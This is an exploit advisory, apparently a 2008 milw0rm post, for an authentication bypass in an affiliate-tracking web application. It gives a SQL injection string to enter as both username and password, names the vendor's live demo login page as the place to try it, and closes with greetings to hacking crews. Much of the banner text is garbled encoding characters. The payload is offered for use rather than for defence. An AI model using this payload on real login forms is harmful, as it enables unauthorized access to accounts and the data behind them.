Affiliate Software Java 4.0 - Authentication Bypass

[�0�9�0�0�0�4] �0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4{�0�1¨�0�1�0�6�0�2… �0�1§�0�2�6�7�0�2�6�7�0�2�6�0 �0�1§�0�2�6�7�0�1±�0�1�0�2�0�2…�0�2�6�9 �0�1§�0�2�6�7�0�1±�0�1�0�2�0�2�0�7�0�2…}�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4�0�9�0�0�0�4

 [~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability

 [~] Vendor: www.adserversolutions.com

 [�0�9�0�0 ] Software: Affiliate Software Java 4.0

 [�0�9�0�0 ] author: ((�0�5�0�53d D3v!L))

 [�0�9�0�0 ] Date: 12.12.2008

 [�0�9�0�0 ] Home: www.ahacker.biz

 [�0�9�0�0 ] contact: N/A

[�0�9�0�0 ]  �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 {DEV!L'5 of SYST3M}�0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0 �0�9�0�0

 [�0�9�0�0 ] Exploit:

 �0�9�0�0  username: r0' or ' 1=1--
 �0�9�0�0  password: r0' or ' 1=1--


 [�0�9�0�0 ]login 4 d3m0:

  http://www.adserversolutions.com/affiliate_java/logon.jsp

 [~]-----------------------------{str0ke}---------------------------------------------------

  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker & K374 & /\/\4/\/0/\/
  [~]
  [~] spechial thanks : dolly & 7am3m & EL z0hery & BLACK R053 &{str0ke}
  [~]
  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
  [~]
  [~] xp10.biz & ahacker.biz
  [~]

 [~]--------------------------------------------------------------------------------

# milw0rm.com [2008-12-11]